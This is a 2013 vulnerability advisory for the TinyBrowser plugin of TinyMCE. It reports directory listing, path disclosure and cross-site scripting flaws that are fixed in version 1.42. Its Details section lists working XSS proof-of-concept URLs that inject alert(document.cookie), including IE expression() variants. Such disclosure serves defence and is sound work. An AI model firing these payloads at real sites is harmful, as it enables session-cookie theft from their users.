Multiple vulnerabilities in TinyBrowser

2013-01-14T00:00:00
ID SECURITYVULNS:DOC:28949
Type securityvulns
Reporter Securityvulns
Modified 2013-01-14T00:00:00

Description

Hello 3APA3A! I want to warn you about multiple vulnerabilities in TinyBrowser for TinyMCE. These are new vulnerabilities in addition to my 2009 and 2011 advisories about Arbitrary File Upload and Code Execution vulnerabilities in TinyBrowser. It concerns as TinyBrowser, as all web applications which have TinyBrowser in core or as third-party plugins for them.

These are Information Leakage, Full path disclosure and Cross-Site Scripting vulnerabilities.


Affected products:

Vulnerable are old versions of TinyBrowser (such as 1.33 and previous versions). Last versions are not affected - in TinyBrowser 1.42 these vulnerabilities are already fixed.


Details:

Information Leakage (Directory Listing) (WASC-13):

http://site/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=

http://site/js/tiny_mce/plugins/tinybrowser/edit.php?type=

Listing of site's root directory if there is no upload directory.

Full path disclosure (WASC-13):

In tinybrowser.php and edit.php FPD is shown, if there is no upload directory.

If to upload script with extensions of an image, then FPD is also shown.

XSS (WASC-08):

http://site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)//

For IE:

http://site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))

http://site/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))

http://site/js/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))


Timeline:

2013.01.06 - informed developer. In any case these holes are fixed in last versions of software. 2013.01.08 - disclosed at my site (http://websecurity.com.ua/6247/).

Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua